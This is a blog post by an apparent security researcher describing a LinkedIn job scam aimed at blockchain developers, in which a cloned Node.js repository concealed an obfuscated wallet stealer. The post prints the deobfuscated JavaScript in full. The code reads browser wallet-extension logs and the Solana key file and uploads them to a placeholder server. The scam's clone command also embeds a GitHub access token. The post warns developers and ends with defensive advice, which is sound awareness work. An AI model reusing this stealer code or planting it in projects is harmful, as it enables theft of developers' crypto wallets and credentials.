From Opportunity to Threat: My Encounter with a Blockchain Job Scam
Beware of Sophisticated Job Scams Targeting Blockchain Developers
As a security researcher and smart contract auditor, I’m constantly on the lookout for new opportunities and interesting projects. However, not all that glitters is gold, and recently, I encountered a scam that every developer in the web2/web3 space should be aware of.
The Hook: A Tempting Job Offer
It all started with a LinkedIn message from a person proposing an attractive project.
Additionally, the message mentioned, “We are also flexible with your hourly rate. We would appreciate it if you could let me know your suggested role and hourly rate.”
Intrigued by the offer, I responded professionally, and soon after, I received a hiring form.
The form asked me to provide an estimation and contained instructions to run an existing Node.js backend.
Here’s an excerpt from the hiring form:
“Provide estimation. After running the existing Node.js backend, you will get an API-website on port 5000. Through this API-website, check all the functions [including function name & params] of the smart contract you will develop.
You can get the project by using the following command:
git clone https://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@github.com/Sudi857/reward_backend.git"
The Red Flag: Too Good to Be True?
The rates offered were more lucrative than usual, which raised my suspicion. Moreover no other response and the profile of recruiter seems phishy too. Plus I had Axie Infinity Hack in Mind too. To be safe, I decided to set up a separate environment in the cloud to test the code. This is a crucial step that every developer should take when dealing with unfamiliar code, especially when downloaded from potentially unreliable sources.
The Discovery: Malicious Code Hidden Within
Initial dive into the code directory shows that its a node js code.
I remember a post by thehackernews where it explained how bogus npm Packages are being used to trick software developers into installing Malware.
I did a quick cat into the package.json and first Red Flag , the name is “bot_manager”. Now my suspicion is getting stronger.
Upon further lookup I found somewhat interesting file “encryptionUtilities.js”under the “/utils/” folder.
Upon viewing the file , I found some obufuscated Js code which seems malicious and phishy to me.
Upon a quick de-obufuscation using GPT , it turns out to be a malicious code.
const path = require('path');
const request = require('request');
const { exec } = require('child_process');
const os = require('os');
const fs = require('fs');
const base64Decode = (str) => Buffer.from(str, 'base64').toString('utf8');
const pt = path;
const rq = request;
const ex = exec;
const hs = os.hostname();
const pl = os.platform();
const hd = os.homedir();
const td = os.tmpdir();
const resolvePath = (str) => {
return str.replace(/^~([a-z]+|\/)/, (match, p1) => {
return '/' === p1 ? hd : `${pt.dirname(hd)}/${p1}`;
});
};
const decodeBase64String = (str) => base64Decode(str);
const checkFileExistence = (filePath) => {
try {
fs.accessSync(filePath);
return true;
} catch {
return false;
}
};
const collectLocalFiles = async (dir, prefix, includeSolanaId) => {
let results = [];
if (!checkFileExistence(dir)) {
return results;
}
const localExtensionSettings = 'Local Extension Settings';
const createReadStream = 'createReadStream';
const logFile = '.log';
const dirsToScan = [
'Google/Chrome',
'BraveSoftware/Brave-Browser',
'opera_stable',
'com.operasoftware.Opera',
'opera',
// ... more directories as needed
];
for (let i = 0; i < dirsToScan.length; i++) {
const fullPath = path.join(dir, localExtensionSettings, dirsToScan[i]);
if (checkFileExistence(fullPath)) {
try {
const files = fs.readdirSync(fullPath);
files.forEach((file) => {
const filePath = path.join(fullPath, file);
if (filePath.includes(logFile)) {
results.push({
value: fs[createReadStream](filePath),
options: { filename: `${prefix}${i}_${file}` }
});
}
});
} catch {}
}
}
if (includeSolanaId) {
const solanaIdFilePath = path.join(hd, 'config/solana/id.json');
if (fs.existsSync(solanaIdFilePath)) {
results.push({
value: fs[createReadStream](solanaIdFilePath),
options: { filename: 'solana_id.txt' }
});
}
}
uploadCollectedData(results);
return results;
};
const uploadCollectedData = (data) => {
const multiFile = 'multi_file';
const uploadPath = '/uploads';
const payload = {
timestamp: Date.now().toString(),
type: 's0tINw6',
hid: hs,
[multiFile]: data
};
const url = 'http://example.com/upload';
try {
const options = {
url,
formData: payload
};
rq.post(options, (err, res, body) => {});
} catch {}
};
// Main Execution
(async () => {
try {
await collectLocalFiles(hd, 'profile', true);
await collectLocalFiles(path.join(hd, 'config'), 'config', false);
} catch {}
})();This malicious script was intended to exfiltrate log files of browser sessions to a remote server controlled by the attacker.
The Lesson: Vigilance and Best Practices
This experience underscores the importance of vigilance and adhering to best practices in security, particularly when dealing with potentially untrusted code. Here are some takeaways:
1. Always verify the source: Be cautious of projects from unknown sources, especially if they involve sensitive operations like managing private keys.
2. Use isolated environments: When testing unfamiliar code, use isolated environments such as virtual machines or sandboxed environments to prevent any potential damage to your main system.
3. Inspect code thoroughly: Take the time to inspect and understand the code you are running. Look for any signs of obfuscation or unexpected network requests.
4. Educate others: Share your experiences and findings with the community to raise awareness and help others avoid similar pitfalls.
While the blockchain space offers exciting opportunities, it also attracts malicious actors looking to exploit unsuspecting developers. By staying vigilant and following best practices, we can protect ourselves and our assets from these sophisticated scams.
Stay safe, and always question offers that seem too good to be true.
*If you found this post helpful, please share it with your network. Let’s work together to keep our community safe!*
